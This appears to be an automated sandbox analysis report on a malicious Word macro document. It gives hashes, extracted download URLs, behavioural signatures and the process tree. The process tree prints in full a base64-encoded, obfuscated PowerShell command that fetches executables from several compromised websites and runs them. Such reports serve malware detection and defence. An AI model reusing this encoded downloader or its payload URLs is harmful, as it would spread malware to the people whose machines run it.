Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 14:20
Behavioral task
behavioral1
Sample
edc64fe168d272542cb11c3e1f3527af_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
edc64fe168d272542cb11c3e1f3527af_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
edc64fe168d272542cb11c3e1f3527af_JaffaCakes118.doc
-
Size
192KB
-
MD5
edc64fe168d272542cb11c3e1f3527af
-
SHA1
7ed0e29f1093a04015144a05ad8d555e2bcba64e
-
SHA256
b2bff83e324b221fb399d81c45adc6aa217cf5c97c2b7cacd5d92e8fb8757373
-
SHA512
12bf8ef1612c5766adc334e4d421c70836379dc9ec2ef8a4b8fb92b6f2dfb6887f7d9d253e524b7a06761882e332710ddaf4329ea423e18d8352d02f014af223
-
SSDEEP
1536:+rdi1Ir77zOH98Wj2gpng9+a9ik1q9Dba/qrHEs+nPyNdOx7ceX:+rfrzOH98ipgIva/qTX+nPyLOBFX
Malware Config
Extracted
http://zplusshopping.com/wp-content/plugins/8ek/
https://www.cupgel.com/__MACOSX/3/
http://freespiritmind.com/MASD/HowTo/css/J/
http://crewnecksusa.com/wp-content/NJ/
http://www.dougsuniverse.com/pics/yL8/
https://idilsoft.com/admin/B/
https://guhaasmart.com/wp-content/s/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 2768 powershell.exe 30 -
Blocklisted process makes network request 6 IoCs
flow pid Process 6 2764 powershell.exe 8 2764 powershell.exe 10 2764 powershell.exe 12 2764 powershell.exe 13 2764 powershell.exe 14 2764 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25F7104D-E5F1-4B9D-9525-D20F06F852D0}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2656 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2656 WINWORD.EXE 2656 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2656 wrote to memory of 2144 2656 WINWORD.EXE 34 PID 2656 wrote to memory of 2144 2656 WINWORD.EXE 34 PID 2656 wrote to memory of 2144 2656 WINWORD.EXE 34 PID 2656 wrote to memory of 2144 2656 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\edc64fe168d272542cb11c3e1f3527af_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABHAHkAZwBwAG8AaAA1AD0AKAAnAE8AYQAnACsAJwBzACcAKwAoACcAaQAnACsAJwBzADMAcAAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAGUAUgBwAFIAbwBGAEkATABlAFwAVwBjADUAUwB1AHcAZABcAGkASgB6AGUAcgBsAEQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBDAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAHUAUgBJAGAAVABgAHkAYABwAGAAUgBvAHQAbwBgAGMAbwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACgAJwAsACAAJwArACcAdABsACcAKQArACgAJwBzACcAKwAnADEAMQAsACcAKQArACgAJwAgACcAKwAnAHQAbABzACcAKQApADsAJABBAGwAMQBvADQAcwAwACAAPQAgACgAKAAnAEYAMQAnACsAJwByAHgAJwApACsAKAAnAGcANAAnACsAJwB2ACcAKQArACcANwAnACkAOwAkAFkAMQBjAGgAaABwAHoAPQAoACgAJwBCACcAKwAnAGYAZgBsAHQAJwApACsAJwB2ACcAKwAnAHkAJwApADsAJABNAHgAcQBiAGwANwBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAZABWAFgAJwArACcAVwBjADUAJwApACsAJwBzACcAKwAnAHUAJwArACgAJwB3AGQAJwArACcAZAAnACkAKwAoACcAVgBYACcAKwAnAEkAJwApACsAKAAnAGoAJwArACcAegBlACcAKwAnAHIAbABkAGQAVgBYACcAKQApACAAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADEAMAAwACsAWwBDAGgAQQBSAF0AOAA2ACsAWwBDAGgAQQBSAF0AOAA4ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAQQBsADEAbwA0AHMAMAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFgAOQB0AGQANgBfAHUAPQAoACcAQQAnACsAJwA4ADMAJwArACgAJwA1ACcAKwAnAHEAcgBxACcAKQApADsAJABRAHUAMwB5AGMANQBqAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMAbABJAEUATgB0ADsAJABWADcAOABzAHUAaABmAD0AKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAJwB6ACcAKwAnAHAAJwArACcAbAB1ACcAKwAnAHMAJwArACcAcwAnACsAKAAnAGgAJwArACcAbwBwAHAAJwArACcAaQBuAGcAJwApACsAJwAuAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwB3AHAALQAnACkAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQAJwArACgAJwAvAHAAJwArACcAbAAnACkAKwAoACcAdQBnAGkAJwArACcAbgAnACkAKwAnAHMALwAnACsAKAAnADgAZQBrACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACgAJwA6AC8AJwArACcALwB3ACcAKQArACcAdwB3ACcAKwAnAC4AYwAnACsAKAAnAHUAcABnAGUAJwArACcAbAAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwBfACcAKwAnAF8ATQBBAEMATwBTAFgAJwArACcALwAzACcAKwAnAC8AKgBoAHQAJwApACsAJwB0ACcAKwAoACcAcAA6ACcAKwAnAC8ALwAnACkAKwAnAGYAcgAnACsAKAAnAGUAZQBzACcAKwAnAHAAJwApACsAJwBpACcAKwAoACcAcgBpAHQAbQBpAG4AZAAnACsAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAE0AQQBTAEQALwBIACcAKwAnAG8AdwAnACkAKwAoACcAVAAnACsAJwBvAC8AYwBzACcAKQArACcAcwAnACsAKAAnAC8ASgAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AYwByACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAbgBlACcAKQArACgAJwBjACcAKwAnAGsAcwAnACkAKwAoACcAdQAnACsAJwBzAGEAJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AJwArACcAdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuAHQAJwApACsAJwBlAG4AJwArACgAJwB0AC8ATgBKACcAKwAnAC8AKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAnAC8ALwB3ACcAKwAnAHcAdwAuACcAKwAnAGQAbwAnACkAKwAnAHUAZwAnACsAJwBzAHUAJwArACgAJwBuAGkAJwArACcAdgBlACcAKQArACcAcgBzACcAKwAnAGUALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBwAGkAJwArACcAYwBzACcAKwAnAC8AeQAnACsAKAAnAEwAOAAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8ALwBpAGQAaQBsACcAKwAnAHMAJwArACcAbwAnACkAKwAoACcAZgB0AC4AJwArACcAYwAnACkAKwAnAG8AJwArACgAJwBtAC8AYQBkAG0AaQAnACsAJwBuAC8AQgAvACcAKwAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwBnAHUAJwArACcAaABhAGEAJwArACcAcwAnACkAKwAnAG0AJwArACcAYQAnACsAJwByACcAKwAoACcAdAAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACsAJwBlACcAKwAnAG4AJwArACcAdAAnACsAJwAvACcAKwAnAHMALwAnACkALgAiAFMAcABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA3AHEAcgAyADIAbgA9ACgAJwBVAGEAJwArACgAJwBxACcAKwAnAHcAagBuAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAGYAeQBuADEAXwBrACAAaQBuACAAJABWADcAOABzAHUAaABmACkAewB0AHIAeQB7ACQAUQB1ADMAeQBjADUAagAuACIAZABgAE8AVwBuAGAATABvAEEAZABmAGkAbABlACIAKAAkAEUAZgB5AG4AMQBfAGsALAAgACQATQB4AHEAYgBsADcAbAApADsAJABWAG8AawA3AGIANAB6AD0AKAAoACcARQBpACcAKwAnAGgAawAnACkAKwAoACcAeAAnACsAJwA3ADMAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQB4AHEAYgBsADcAbAApAC4AIgBsAGAAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwAxADcAMQA2ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAE0AeABxAGIAbAA3AGwAKQA7ACQAQgBhAHgAZgBnAHMAZgA9ACgAJwBZAGsAJwArACcANQAnACsAKAAnAHUAJwArACcAOQB2AHgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAYQBiAGgAdQBjAHMAPQAoACgAJwBNACcAKwAnAGwAdAAnACkAKwAoACcAdQAnACsAJwBjADAAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA5AGgAbQBiAF8AeAA9ACgAKAAnAEQAbAAnACsAJwBkACcAKQArACgAJwBzADYAbwAnACsAJwBoACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD506902529ecae9f3cafe492d1e2c2a5b8
SHA152a6a2f5acf8a6132e80cf509a6847213ca17538
SHA256e73a94bd66b5b03fc101bac5c47662fefdda4f24c86868b5682f03d316ed406c
SHA5128dbd4a8e262d74efacb073e164fe0ee4fd8c670a8292bc1e04909d4420b68e063558513be3ba66fa28c7b3568753cdea2d6ef6ef286dc2d65dfa54fefbddfd52